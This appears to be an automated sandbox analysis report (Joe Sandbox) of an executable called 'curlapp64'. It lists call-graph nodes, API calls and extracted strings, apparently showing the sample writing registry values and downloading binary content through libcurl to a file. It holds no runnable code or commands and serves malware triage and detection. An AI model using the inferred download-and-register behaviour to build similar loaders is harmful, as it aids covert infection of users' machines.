95489->95509 95490 7ff8b7e74bb0 14 API calls 95492 7ff8b7ec3a26 95490->95492 95491->95490 95491->95509 95493 7ff8b7ec3a31 95492->95493 95494 7ff8b7ec3a4c 95492->95494 95515 7ff8b7ec57e0 16 API calls 95493->95515 95495 7ff8b7ec3ad6 95494->95495 95496 7ff8b7ec3a58 95494->95496 95501 7ff8b7ec3af0 95495->95501 95502 7ff8b7ec3ada 95495->95502 95499 7ff8b7ec3a80 95496->95499 95500 7ff8b7ec3a5f 95496->95500 95498 7ff8b7ec3a42 95498->95494 95512 7ff8b7ec3b47 95498->95512 95506 7ff8b7ec3a6e 95499->95506 95517 7ff8b7e74a70 14 API calls 95499->95517 95516 7ff8b7e74a70 14 API calls 95500->95516 95504 7ff8b7ec3b1b 95501->95504 95508 7ff8b7ec3b05 95501->95508 95518 7ff8b7e74a70 14 API calls 95502->95518 95514 7ff8b7ec1420 224 API calls 95504->95514 95506->95512 95513 7ff8b7eb3b60 2 API calls 95506->95513 95507 7ff8b7e74bb0 14 API calls 95507->95509 95519 7ff8b7e74a70 14 API calls 95508->95519 95512->95507 95513->95512 95514->95506 95515->95498 95516->95506 95517->95506 95518->95506 95519->95506 95520 7ff8b7e66290 send 95521 7ff8b7e66314 WSAGetLastError 95520->95521 95522 7ff8b7e66366 95520->95522 95523 7ff8b7e66323 95521->95523 95524 7ff8b7e6632e 95521->95524 95522->95523 95525 7ff8b7eb3b60 2 API calls 95522->95525 95526 7ff8b7e74bb0 14 API calls 95523->95526 95537 7ff8b7eaec40 21 API calls 95524->95537 95528 7ff8b7e66379 95525->95528 95529 7ff8b7e66465 95526->95529 95528->95523 95534 7ff8b7e663b3 WSAIoctl 95528->95534 95531 7ff8b7ec9e10 8 API calls 95529->95531 95530 7ff8b7e66343 95538 7ff8b7e74a70 14 API calls 95530->95538 95533 7ff8b7e66488 95531->95533 95534->95523 95535 7ff8b7e663f7 95534->95535 95535->95523 95536 7ff8b7e66403 setsockopt 95535->95536 95536->95523 95537->95530 95538->95523 95539 7ff8b7e68cd0 95543 7ff8b7e68d1b 95539->95543 95551 7ff8b7e68d0e 95539->95551 95540 7ff8b7e68dd5 95541 7ff8b7e68e7b 95540->95541 95544 7ff8b7e68de0 95540->95544 95594 7ff8b7e69a80 8 API calls 95541->95594 95543->95551 95554 7ff8b7e64e50 95543->95554 95545 7ff8b7e68e46 95544->95545 95544->95551 95587 7ff8b7e665f0 95544->95587 95592 7ff8b7e69a80 8 API calls 95545->95592 95547 7ff8b7e68e52 95548 7ff8b7eb3b60 2 API calls 95547->95548 95549 7ff8b7e68e5c 95548->95549 95593 7ff8b7eb6810 18 API calls 95549->95593 95555 7ff8b7e64e81 95554->95555 95556 7ff8b7e64e70 95554->95556 95557 7ff8b7eb3b60 2 API calls 95555->95557 95556->95540 95558 7ff8b7e64e93 95557->95558 95559 7ff8b7e74bb0 14 API calls 95558->95559 95561 7ff8b7e64e9c 95558->95561 95560 7ff8b7e64ee2 95559->95560 95562 7ff8b7e64eec 95560->95562 95563 7ff8b7e64f29 95560->95563 95575 7ff8b7e64fa7 95561->95575 95577 7ff8b7e64f91 95561->95577 95580 7ff8b7e64ea5 95561->95580 95595 7ff8b7e65aa0 7 API calls 95562->95595 95563->95561 95597 7ff8b7e65aa0 7 API calls 95563->95597 95565 7ff8b7e6504d 95572 7ff8b7e65124 95565->95572 95574 7ff8b7e74bb0 14 API calls 95565->95574 95566 7ff8b7e74bb0 14 API calls 95569 7ff8b7e6519c 95566->95569 95568 7ff8b7e64f0a 95568->95561 95596 7ff8b7e974f0 20 API calls 95568->95596 95569->95540 95570 7ff8b7e65028 95599 7ff8b7e65aa0 7 API calls 95570->95599 95576 7ff8b7e74bb0 14 API calls 95572->95576 95572->95580 95578 7ff8b7e6508b 95574->95578 95575->95565 95575->95570 95583 7ff8b7e65107 95575->95583 95586 7ff8b7e65016 95575->95586 95576->95580 95598 7ff8b7e657c0 17 API calls 95577->95598 95578->95572 95581 7ff8b7e650aa 95578->95581 95580->95566 95600 7ff8b7e657c0 17 API calls 95581->95600 95582 7ff8b7e74bb0 14 API calls 95582->95570 95601 7ff8b7e974f0 20 API calls 95583->95601 95586->95582 95588 7ff8b7e6660a 95587->95588 95589 7ff8b7e66613 95587->95589 95588->95589 95590 7ff8b7e67f90 34 API calls 95588->95590 95589->95544 95591 7ff8b7e66664 95590->95591 95591->95544 95592->95547 95593->95551 95594->95551 95595->95568 95596->95561 95597->95561 95598->95580 95599->95565 95600->95580 95601->95565 95602 7ff8b7e6aa90 95603 7ff8b7e6aad4 95602->95603 95604 7ff8b7e6aae9 95603->95604 95606 7ff8b7e787f0 AcquireSRWLockExclusive 95603->95606 95607 7ff8b7e7882e ReleaseSRWLockExclusive 95606->95607 95608 7ff8b7e7880a 95606->95608 95614 7ff8b7eb62c0 calloc 95607->95614 95609 7ff8b7e79070 48 API calls 95608->95609 95611 7ff8b7e78816 95609->95611 95611->95607 95613 7ff8b7e7881a ReleaseSRWLockExclusive 95611->95613 95612 7ff8b7e78845 95612->95604 95613->95604 95615 7ff8b7eb62e6 95614->95615 95616 7ff8b7eb62f7 95614->95616 95615->95612 95631 7ff8b7e62560 calloc 95616->95631 95618 7ff8b7eb6322 95619 7ff8b7eb6347 __acrt_iob_func __acrt_iob_func __acrt_iob_func 95618->95619 95620 7ff8b7eb6328 95618->95620 95633 7ff8b7e92da0 memset 95619->95633 95632 7ff8b7ea00f0 6 API calls 95620->95632 95624 7ff8b7eb6438 95634 7ff8b7ec49f0 realloc GetEnvironmentVariableA realloc free free 95624->95634 95626 7ff8b7eb6473 95627 7ff8b7eb647d 95626->95627 95635 7ff8b7ec49f0 realloc GetEnvironmentVariableA realloc free free 95626->95635 95636 7ff8b7e826c0 free free free free free 95627->95636 95630 7ff8b7eb6548 95630->95612 95631->95618 95633->95624 95634->95626 95635->95627 95636->95630 95637 7ff6cf9a3d7c 95658 7ff6cf9a4288 95637->95658 95640 7ff6cf9a3ec8 95719 7ff6cf9a491c 7 API calls 2 library calls 95640->95719 95641 7ff6cf9a3d98 __scrt_acquire_startup_lock 95643 7ff6cf9a3ed2 95641->95643 95650 7ff6cf9a3db6 __scrt_release_startup_lock 95641->95650 95720 7ff6cf9a491c 7 API calls 2 library calls 95643->95720 95645 7ff6cf9a3ddb 95646 7ff6cf9a3edd BuildCatchObjectHelperInternal 95647 7ff6cf9a3e61 95664 7ff6cf9a4a64 95647->95664 95649 7ff6cf9a3e66 95667 7ff6cf999950 95649->95667 95650->95645 95650->95647 95716 7ff6cf9b3738 69 API calls __GSHandlerCheck_EH 95650->95716 95659 7ff6cf9a4290 95658->95659 95660 7ff6cf9a429c __scrt_dllmain_crt_thread_attach 95659->95660 95661 7ff6cf9a3d90 95660->95661 95662 7ff6cf9a42a9 95660->95662 95661->95640 95661->95641 95662->95661 95721 7ff6cf9a5e80 7 API calls 2 library calls 95662->95721 95722 7ff6cf9c6460 95664->95722 95724 7ff6cf99aa00 95667->95724 95669 7ff6cf9999a7 95729 7ff6cf998d30 95669->95729 95672 7ff6cf999a36 numpunct 95675 7ff6cf999a81 curl_global_init 95672->95675 95676 7ff6cf999a93 95672->95676 95707 7ff6cf999fc9 95672->95707 95673 7ff6cf9999ec RegSetValueExW RegCloseKey 95673->95672 95675->95676 95745 7ff6cf99a440 95676->95745 95678 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95680 7ff6cf999fcf 95678->95680 95683 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95680->95683 95681 7ff6cf99a440 71 API calls 95682 7ff6cf999abf 95681->95682 95684 7ff6cf998d30 73 API calls 95682->95684 95685 7ff6cf999fd5 95683->95685 95688 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95685->95688 95689 7ff6cf999fdb 95688->95689 95690 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95689->95690 95691 7ff6cf999fe1 95690->95691 95692 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95691->95692 95694 7ff6cf999fe7 95692->95694 95707->95678 95716->95647 95719->95643 95720->95646 95721->95661 95723 7ff6cf9a4a7b GetStartupInfoW 95722->95723 95723->95649 95725 7ff6cf99ab27 95724->95725 95728 7ff6cf99aa26 ctype 95724->95728 95901 7ff6cf971280 71 API calls 95725->95901 95728->95669 95730 7ff6cf9c6460 __scrt_get_show_window_mode 95729->95730 95731 7ff6cf998d7d GetModuleHandleExW 95730->95731 95732 7ff6cf998db8 GetModuleFileNameW 95731->95732 95733 7ff6cf998d9d 95731->95733 95732->95733 95734 7ff6cf998dd1 95732->95734 95735 7ff6cf9a3b30 std::_Xinvalid_argument 8 API calls 95733->95735 95737 7ff6cf99aa00 71 API calls 95734->95737 95736 7ff6cf998f84 RegOpenKeyExW 95735->95736 95736->95672 95736->95673 95739 7ff6cf998e06 95737->95739 95738 7ff6cf998f6d numpunct 95738->95733 95739->95733 95739->95738 95740 7ff6cf99920e 95739->95740 95741 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95740->95741 95742 7ff6cf999213 95741->95742 95743 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95742->95743 95744 7ff6cf999219 95743->95744 95746 7ff6cf99a492 95745->95746 95747 7ff6cf99a485 95745->95747 95902 7ff6cf9989b0 95746->95902 95918 7ff6cf99ad30 71 API calls 6 library calls 95747->95918 95751 7ff6cf99a63e numpunct 95754 7ff6cf9a3b30 std::_Xinvalid_argument 8 API calls 95751->95754 95753 7ff6cf99a6b1 95930 7ff6cf971280 71 API calls 95753->95930 95755 7ff6cf999aa9 95754->95755 95755->95681 95756 7ff6cf99a6ab 95762 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95756->95762 95757 7ff6cf99a54d ctype 95757->95751 95757->95756 95760 7ff6cf99a4dd __scrt_get_show_window_mode 95760->95753 95760->95757 95761 7ff6cf99a57c 95760->95761 95764 7ff6cf99a5d9 95760->95764 95767 7ff6cf99a6a5 95761->95767 95920 7ff6cf9a3b58 95761->95920 95762->95753 95765 7ff6cf9a3b58 std::_Facet_Register 71 API calls 95764->95765 95765->95757 95929 7ff6cf9711e0 71 API calls 2 library calls 95767->95929 95769 7ff6cf99a6a0 95770 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95769->95770 95770->95767 95905 7ff6cf9989f5 95902->95905 95914 7ff6cf9989eb numpunct 95902->95914 95903 7ff6cf9a3b30 std::_Xinvalid_argument 8 API calls 95904 7ff6cf998d1e 95903->95904 95904->95760 95919 7ff6cf99ad30 71 API calls 6 library calls 95904->95919 95905->95914 95931 7ff6cf998240 71 API calls 6 library calls 95905->95931 95907 7ff6cf998a3a 95932 7ff6cf998680 8 API calls std::_Xinvalid_argument 95907->95932 95909 7ff6cf998b67 95913 7ff6cf998ba5 ctype __scrt_get_show_window_mode 95909->95913 95934 7ff6cf998680 8 API calls std::_Xinvalid_argument 95909->95934 95910 7ff6cf998a49 95910->95909 95933 7ff6cf998680 8 API calls std::_Xinvalid_argument 95910->95933 95913->95914 95915 7ff6cf998d2a 95913->95915 95914->95903 95916 7ff6cf9b1878 _invalid_parameter_noinfo_noreturn 69 API calls 95915->95916 95917 7ff6cf998d2f 95916->95917 95918->95746 95919->95760 95921 7ff6cf9a3b63 95920->95921 95922 7ff6cf99a595 95921->95922 95924 7ff6cf9a3b82 95921->95924 95935 7ff6cf9b2ad0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 95921->95935 95922->95757 95922->95769 95925 7ff6cf9a3b8d 95924->95925 95936 7ff6cf9a264c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 95924->95936 95937 7ff6cf9711e0 71 API calls 2 library calls 95925->95937 95928 7ff6cf9a3b93 95929->95756 95931->95907 95932->95910 95933->95910 95934->95913 95935->95921 95937->95928 96439 7ff8b7e9fec0 memset 96440 7ff8b7e9feed 96439->96440 96441 7ff6cf9b8410 VirtualProtect 96442 7ff6cf9b3586 96454 7ff6cf9b2bcc 96442->96454 96479 7ff6cf9b5f90 96454->96479 96456 7ff6cf9b2bd5 96485 7ff6cf9b2714 96456->96485 96480 7ff6cf9b5ff0 _Strcoll 13 API calls 96479->96480 96481 7ff6cf9b5f99 96480->96481 96482 7ff6cf9b5f9e 96481->96482 96483 7ff6cf9b2714 BuildCatchObjectHelperInternal 69 API calls 96481->96483 96482->96456 96484 7ff6cf9b5fa8 96483->96484 96494 7ff6cf9bcae8 EnterCriticalSection LeaveCriticalSection BuildCatchObjectHelperInternal 96485->96494 96487 7ff6cf9b271d 96488 7ff6cf9b272c 96487->96488 96495 7ff6cf9bcb38 69 API calls 5 library calls 96487->96495 96490 7ff6cf9b275f BuildCatchObjectHelperInternal 96488->96490 96491 7ff6cf9b2735 IsProcessorFeaturePresent 96488->96491 96492 7ff6cf9b2744 96491->96492 96496 7ff6cf9b158c 14 API calls 3 library calls 96492->96496 96494->96487 96495->96488 96496->96490 96498 7ff8b7e62380 96499 7ff8b7e623c8 96498->96499 96500 7ff8b7e623cd 96498->96500 96502 7ff8b7e843b0 2 API calls 96499->96502 96501 7ff8b7eb3b60 2 API calls 96500->96501 96503 7ff8b7e6241b 96501->96503 96502->96500 96508 7ff8b7e62a50 calloc 96503->96508 96506 7ff8b7e6243a 96509 7ff8b7e62bf4 _errno 96508->96509 96510 7ff8b7e62aa1 malloc 96508->96510 96513 7ff8b7e62436 96509->96513 96511 7ff8b7e62b53 96510->96511 96512 7ff8b7e62b22 InitializeCriticalSectionEx 96510->96512 96515 7ff8b7e62b6d closesocket 96511->96515 96516 7ff8b7e62b7b 96511->96516 96547 7ff8b7eab3f0 socket 96512->96547 96513->96506 96546 7ff8b7e74a70 14 API calls 96513->96546 96515->96516 96518 7ff8b7e62b94 free 96516->96518 96519 7ff8b7e62b84 DeleteCriticalSection free 96516->96519 96521 7ff8b7e62bac 96518->96521 96522 7ff8b7e62ba7 96518->96522 96519->96518 96520 7ff8b7e62c1c _strdup 96520->96511 96523 7ff8b7e62c36 free _strdup 96520->96523 96525 7ff8b7e62bbc free 96521->96525 96526 7ff8b7e62bb6 closesocket 96521->96526 96581 7ff8b7e716c0 free 96522->96581 96527 7ff8b7e62c58 96523->96527 96528 7ff8b7e62c84 96523->96528 96525->96509 96526->96525 96579 7ff8b7e748e0 _beginthreadex 96527->96579 96530 7ff8b7e62c90 EnterCriticalSection LeaveCriticalSection 96528->96530 96531 7ff8b7e62d02 free 96528->96531 96533 7ff8b7e62ccb 96530->96533 96534 7ff8b7e62cba 96530->96534 96531->96509 96537 7ff8b7e62cd8 96533->96537 96538 7ff8b7e62cd0 96533->96538 96582 7ff8b7e74920 CloseHandle 96534->96582 96535 7ff8b7e62c74 _errno 96535->96528 96584 7ff8b7e628c0 DeleteCriticalSection free free closesocket free 96537->96584 96583 7ff8b7e74930 WaitForSingleObjectEx CloseHandle 96538->96583 96540 7ff8b7e62cc2 96543 7ff8b7e62cee 96540->96543 96542 7ff8b7e62ce1 free 96542->96543 96585 7ff8b7e978b0 free 96543->96585 96545 7ff8b7e62cf9 closesocket 96545->96531 96546->96506 96548 7ff8b7eab43a 96547->96548 96549 7ff8b7eab43f htonl setsockopt 96547->96549 96552 7ff8b7ec9e10 8 API calls 96548->96552 96550 7ff8b7eab661 closesocket closesocket closesocket 96549->96550 96551 7ff8b7eab4c4 bind 96549->96551 96550->96548 96551->96550 96553 7ff8b7eab4e0 getsockname 96551->96553 96554 7ff8b7e62b4b 96552->96554 96553->96550 96555 7ff8b7eab4fa 96553->96555 96554->96511 96554->96520 96555->96550 96556 7ff8b7eab504 listen 96555->96556 96556->96550 96557 7ff8b7eab51b socket 96556->96557 96557->96550 96558 7ff8b7eab538 connect 96557->96558 96558->96550 96559 7ff8b7eab554 96558->96559 96586 7ff8b7e9c2d0 ioctlsocket 96559->96586 96561 7ff8b7eab561 96561->96550 96562 7ff8b7ea2110 17 API calls 96561->96562 96563 7ff8b7eab588 accept 96562->96563 96563->96550 96564 7ff8b7eab5a4 96563->96564 96565 7ff8b7eb3b60 2 API calls 96564->96565 96566 7ff8b7eab5ad 96565->96566 96566->96550 96567 7ff8b7eab5cf send 96566->96567 96572 7ff8b7eab5e2 96567->96572 96568 7ff8b7ea2110 17 API calls 96569 7ff8b7eab605 recv 96568->96569 96570 7ff8b7eab625 WSAGetLastError 96569->96570 96569->96572 96571 7ff8b7eb3b60 2 API calls 96570->96571 96571->96572 96572->96550 96572->96568 96574 7ff8b7eab6cf 96572->96574 96573 7ff8b7eab717 closesocket 96573->96548 96574->96550 96574->96573 96587 7ff8b7e9c2d0 ioctlsocket 96574->96587 96576 7ff8b7eab6f9 96576->96550 96588 7ff8b7e9c2d0 ioctlsocket 96576->96588 96578 7ff8b7eab70f 96578->96550 96578->96573 96580 7ff8b7e62c6c 96579->96580 96580->96513 96580->96535 96581->96521 96582->96540 96583->96537 96584->96542 96585->96545 96586->96561 96587->96576 96588->96578 96589 7ff8b7e62940 96590 7ff8b7e94eb0 8 API calls 96589->96590 96591 7ff8b7e6297f 96590->96591 96608 7ff8b7e716f0 getaddrinfo 96591->96608 96594 7ff8b7e629be EnterCriticalSection 96597 7ff8b7e629cd LeaveCriticalSection 96594->96597 96598 7ff8b7e629e9 96594->96598 96595 7ff8b7e6299b WSAGetLastError 96596 7ff8b7e629a5 WSAGetLastError 96595->96596 96599 7ff8b7e629b2 96595->96599 96596->96594 96596->96599 96623 7ff8b7e628c0 DeleteCriticalSection free free closesocket free 96597->96623 96601 7ff8b7e62a19 LeaveCriticalSection 96598->96601 96602 7ff8b7e629f3 send 96598->96602 96599->96594 96603 7ff8b7e62a29 96601->96603 96602->96601 96605 7ff8b7e62a10 WSAGetLastError 96602->96605 96606 7ff8b7ec9e10 8 API calls 96603->96606 96604 7ff8b7e629de free 96604->96603 96605->96601 96607 7ff8b7e62a38 96606->96607 96609 7ff8b7e62995 96608->96609 96611 7ff8b7e7171d 96608->96611 96609->96594 96609->96595 96610 7ff8b7e7186e WSASetLastError 96610->96609 96611->96610 96611->96611 96612 7ff8b7e71822 96611->96612 96615 7ff8b7e7179a malloc 96611->96615 96613 7ff8b7e7183e freeaddrinfo 96612->96613 96614 7ff8b7e71844 96612->96614 96613->96614 96616 7ff8b7e71869 96614->96616 96617 7ff8b7e71849 96614->96617 96618 7ff8b7e717af memmove 96615->96618 96619 7ff8b7e71824 96615->96619 96616->96609 96616->96610 96617->96609 96622 7ff8b7e71850 free 96617->96622 96620 7ff8b7e717eb memmove 96618->96620 96621 7ff8b7e71802 96618->96621 96619->96612 96620->96621 96621->96611 96622->96609 96622->96622 96623->96604 96624 7ff8b7e78e40 AcquireSRWLockExclusive 96625 7ff8b7e78e5b 96624->96625 96626 7ff8b7e78e85 ReleaseSRWLockExclusive 96624->96626 96625->96626 96631 7ff8b7ec4d70 96625->96631 96628 7ff8b7e78e6b 96635 7ff8b7eafde0 96628->96635 96632 7ff8b7ec4d87 96631->96632 96633 7ff8b7ec4d7d 96631->96633 96632->96628 96642 7ff8b7e74810 96633->96642 96636 7ff8b7eafdf4 FreeLibrary 96635->96636 96637 7ff8b7eafe0a 96635->96637 96636->96637 96638 7ff8b7e74810 FreeLibrary 96637->96638 96639 7ff8b7eafe0f 96638->96639 96640 7ff8b7e78e7b 96639->96640 96641 7ff8b7eafe14 WSACleanup 96639->96641 96640->96626 96641->96640 96643 7ff8b7e74836 96642->96643 96644 7ff8b7e74820 FreeLibrary 96642->96644 96643->96632 96644->96643

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF8B7EC04A6 Relevance: 177.7, APIs: 57, Strings: 44, Instructions: 927COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProcfree
                                                                                                                                                                                                  • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                                                                                                                                                  • API String ID: 3799942571-230586194
                                                                                                                                                                                                  • Opcode ID: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                                                                                                                                                  • Instruction ID: 51cdc02d7deb8f7908fb323b66708371a71333d9a4259f43e8cb5d9f99665dcb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36926A69A08B8285EB658B79A8503BD27A1BF45FD8F044139DB4D47BB4EF7CE548C700
                                                                                                                                                                                                  Function 00007FF6CF975040 Relevance: 49.5, APIs: 17, Strings: 11, Instructions: 474COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 516 7ff6cf975040-7ff6cf975087 517 7ff6cf97508c-7ff6cf975127 curl_easy_setopt * 6 516->517 518 7ff6cf975089 516->518 519 7ff6cf975129-7ff6cf97512f 517->519 520 7ff6cf975141 517->520 518->517 521 7ff6cf975144-7ff6cf975173 curl_easy_setopt 519->521 522 7ff6cf975131-7ff6cf975134 519->522 520->521 524 7ff6cf975175-7ff6cf97517b 521->524 525 7ff6cf975190 521->525 522->520 523 7ff6cf975136-7ff6cf97513d 522->523 523->522 526 7ff6cf97513f 523->526 527 7ff6cf97517d 524->527 528 7ff6cf975193-7ff6cf9751b6 curl_easy_setopt curl_easy_perform 524->528 525->528 526->521 529 7ff6cf975180-7ff6cf975183 527->529 530 7ff6cf9751b8-7ff6cf9751d8 curl_easy_strerror 528->530 531 7ff6cf975213-7ff6cf975252 curl_easy_getinfo * 2 528->531 529->525 535 7ff6cf975185-7ff6cf97518c 529->535 532 7ff6cf9751e0-7ff6cf9751e7 530->532 533 7ff6cf9753a8 531->533 534 7ff6cf975258-7ff6cf97525f 531->534 532->532 536 7ff6cf9751e9-7ff6cf97520e call 7ff6cf97b6c0 532->536 537 7ff6cf9753ad 533->537 534->533 538 7ff6cf975265-7ff6cf975278 534->538 535->529 539 7ff6cf97518e 535->539 547 7ff6cf97573a-7ff6cf97575f call 7ff6cf9a3b30 536->547 541 7ff6cf9753b0-7ff6cf9753b5 537->541 542 7ff6cf975280-7ff6cf975287 538->542 539->528 544 7ff6cf9753b7-7ff6cf9753bf 541->544 545 7ff6cf9753f2-7ff6cf9753f5 541->545 542->542 546 7ff6cf975289-7ff6cf9752ba call 7ff6cf97b6c0 542->546 544->545 548 7ff6cf9753c1-7ff6cf9753cf 544->548 550 7ff6cf9756ab-7ff6cf975737 call 7ff6cf980460 545->550 551 7ff6cf9753fb-7ff6cf975427 curl_easy_setopt call 7ff6cf9c6460 545->551 562 7ff6cf9752bc-7ff6cf9752c7 546->562 563 7ff6cf975323-7ff6cf975338 546->563 553 7ff6cf9753ea-7ff6cf9753ed call 7ff6cf9a3b50 548->553 554 7ff6cf9753d1-7ff6cf9753e4 548->554 550->547 567 7ff6cf97542c-7ff6cf975463 call 7ff6cf9784c0 551->567 568 7ff6cf975429 551->568 553->545 554->553 560 7ff6cf9757b0-7ff6cf9757b5 call 7ff6cf9b1878 554->560 566 7ff6cf9752ca-7ff6cf9752d7 call 7ff6cf9c5c20 562->566 563->537 565 7ff6cf97533a-7ff6cf975359 call 7ff6cf9c5c20 563->565 565->537 579 7ff6cf97535b 565->579 566->563 580 7ff6cf9752d9-7ff6cf9752fa 566->580 577 7ff6cf9754fd-7ff6cf97551e curl_easy_setopt curl_easy_perform call 7ff6cf9783c0 567->577 578 7ff6cf975469-7ff6cf9754f8 call 7ff6cf97b6c0 call 7ff6cf9774d0 call 7ff6cf9a2b94 567->578 568->567 589 7ff6cf975523-7ff6cf975526 577->589 578->547 584 7ff6cf975360-7ff6cf975377 call 7ff6cf9c6360 579->584 581 7ff6cf9752fc-7ff6cf975300 580->581 582 7ff6cf975308-7ff6cf975315 580->582 581->582 586 7ff6cf975302-7ff6cf975306 581->586 582->566 597 7ff6cf97539b-7ff6cf9753a1 584->597 598 7ff6cf975379-7ff6cf975397 call 7ff6cf9c5c20 584->598 586->582 590 7ff6cf975317-7ff6cf97531d 586->590 593 7ff6cf975528-7ff6cf975553 589->593 594 7ff6cf975559-7ff6cf97555b 589->594 590->563 595 7ff6cf9753a3-7ff6cf9753a6 590->595 593->594 599 7ff6cf975760-7ff6cf975762 593->599 600 7ff6cf97561a-7ff6cf9756a6 call 7ff6cf97b6c0 call 7ff6cf9774d0 call 7ff6cf9a2b94 594->600 601 7ff6cf975561-7ff6cf97557a curl_easy_strerror 594->601 595->541 597->537 597->595 598->584 616 7ff6cf975399 598->616 602 7ff6cf97576d-7ff6cf97577d 599->602 603 7ff6cf975764-7ff6cf97576b 599->603 600->547 607 7ff6cf975580-7ff6cf975587 601->607 609 7ff6cf975781-7ff6cf9757af call 7ff6cf9713c0 call 7ff6cf971d30 call 7ff6cf9a5b70 602->609 603->609 607->607 608 7ff6cf975589-7ff6cf975615 call 7ff6cf97b6c0 call 7ff6cf9774d0 call 7ff6cf9a2b94 607->608 608->547 609->560 616->537
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: curl_easy_setopt$curl_easy_getinfocurl_easy_performcurl_easy_strerror$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: "$File could not be created.$Response code: {} Content Type: {}$applicat$ion/octe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t-stream$text/plain; charset=utf-8$ZYo
                                                                                                                                                                                                  • API String ID: 4244892839-1014996105
                                                                                                                                                                                                  • Opcode ID: e6261ac78c1bba6af93ee69fe5615f221062075fc40a5810cfd3e81eb06f3c64
                                                                                                                                                                                                  • Instruction ID: 2a85140788feb8fc429cbfceadd88bb2cbb12faf84165eadd1736549719711d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6261ac78c1bba6af93ee69fe5615f221062075fc40a5810cfd3e81eb06f3c64
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2722AD22A18B85C6EF50CF24D8402BD77A0FB85B89F548632DE8D93B9ADF78E545C350
